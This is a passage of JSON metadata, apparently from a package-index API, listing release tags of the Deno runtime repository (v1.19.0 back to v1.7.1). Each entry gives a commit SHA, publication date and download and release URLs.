b/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_